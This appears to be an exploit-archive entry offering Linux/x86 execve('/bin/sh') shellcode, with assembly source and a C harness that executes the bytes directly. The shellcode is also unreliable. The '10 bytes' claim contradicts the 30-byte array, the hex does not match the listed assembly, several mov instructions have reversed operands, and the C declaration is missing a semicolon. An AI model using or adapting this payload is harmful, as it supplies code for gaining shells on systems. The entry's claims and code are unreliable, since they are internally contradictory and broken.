10 bytes small Linux/x86 execve "/bin/sh" shellcode.
17eba74611ee88dd5e7b38ff76974d98# Exploit Title: Linux/x86 - execve "/bin/sh" (10 bytes)
# Google Dork: None
# Date: 20-08-2020
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none
# Shellcode-length : 10
# SLAE-id : Purchased | [email protected]
# Reference : http://shell-storm.org/shellcode/files/shellcode-811.php
/*******************************************************************************
global _start
section .text
_start:
xor eax, eax ; zero our eax
push eax
; push 0x68732f2f
mov eax, 0xd0e65e5e
ror eax, 1 ; shift the register by 1 ro right
push eax
; push 0x6e69622f
add eax, 0x5f63300 ; add 5f63300 to eax register to push 6e69622f
push eax
mov esp,ebx
mov eax,ecx
mov eax,edx
mov al,0xb
int 0x80
; End section for exit call
xor eax,eax
inc eax
int 0x80
*******************************************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x50\xb8\x5e\x5e\xe6\xd0\xd1\xc8\x50\x05\x00\x33\xf6\x05\x50\x89\xdc\x89\xc8\x89\xd0\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}